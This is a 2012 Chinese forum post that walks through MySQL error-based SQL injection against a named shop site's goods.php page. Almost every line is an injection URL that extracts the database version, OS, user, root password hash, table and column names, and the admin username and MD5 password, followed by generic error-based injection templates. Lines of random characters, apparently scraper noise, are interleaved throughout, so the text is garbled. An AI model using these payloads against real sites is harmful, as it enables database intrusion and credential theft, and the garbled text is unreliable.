判断版本号 - t' i9 N% x" {5 ]
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 I/ Q4 e0 K7 N. @. L z4 C, @4 A2 O3 T! r3 V
判断系统
0 B1 {, A4 K7 P$ Z Y+ _, X- i" }2 |! b8 G
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%233 K3 \# Q! F3 w! d; d; N8 a
; M5 I2 v# S/ d. S, m5 b; x% b
' a' \; R! ?6 z5 Y
当前 user()
: y3 N" t/ o- B2 i' o
- A' O6 O4 I/ k2 t+ `http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
* {* [0 i. S' q5 j B4 n7 x- g2 K( p
+ z4 c4 g* h- t7 }& z$ f; V9 \
1 m3 N5 r6 p( S" L. }! ]1 j7 n3 V; L1 I4 ~
当前 database()
# i' U2 g' I; E. e* |7 |, Q! lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 T: }8 O& Q; u3 H o
1 P( E/ F u- U3 \: C
~ S( _, _: t3 Q9 U' f" c6 S1 B9 t- ]
% l5 F0 ?* L1 }$ h
L+ H. e# a( O9 proot hash3 `2 P& w/ p. k6 m" V
# S- w+ z# o: s( G: d9 ?) C* J5 H6 Qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 q. o! e, M3 }+ o$ X1 j; h
* q+ h- g: R% O0 a4 Z
9 j* g% r) w9 a9 L
' |6 |9 G. K( ^6 X- ?( o6 g! u, n- \' J" w当前 数据库表名
- R) U* x; x& I3 W9 C/ c5 z: b
, j( E8 u/ C8 A5 w6 K, \http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 z- D( `; r$ ^, P, d W& e0 `
Y' u: R* P" O, w0 p5 ?, f' E( m- t- B
; E& G2 N8 ~# w
当前 数据库 user_name 字段
" t9 N; J" p3 r a% k8 o$ w' C
7 I- M; N; R& B( a9 U# h( ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
0 @2 n* a3 j( ] \1 a) a
0 n' P7 t8 m5 e$ a& o8 G" T当前 数据库 字段 password0 b+ q/ \/ p$ c
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% R& f, H0 |5 A- t1 [
) n" T" w" I: f. g) ?: a9 d7 v" V* V$ @" Z
8 i8 t* R/ m) z* k1 a* H
获得 admin passwd(md5) H4 r% d+ n& ^1 m+ H; w. W
' M+ g! Y2 F4 Z1 }
& q S; }. C0 K, U5 M4 j9 m
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 F! {+ g+ y+ @1 f/ t8 [4 _
& D( ?5 z! ? x9 f# e6 q7 s报错注射
0 k% X4 t9 l- B/ {# Q, Q v, pSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)* i- i" w {* l7 c5 t: f4 h
& i9 z) Q3 F6 p- v; R3 R! b( K
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
9 K N9 g+ f* A, s5 m, c. O- D5 y+ W7 ^/ R
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |
发表于 2012-9-5 14:59:30
收藏
支持
反对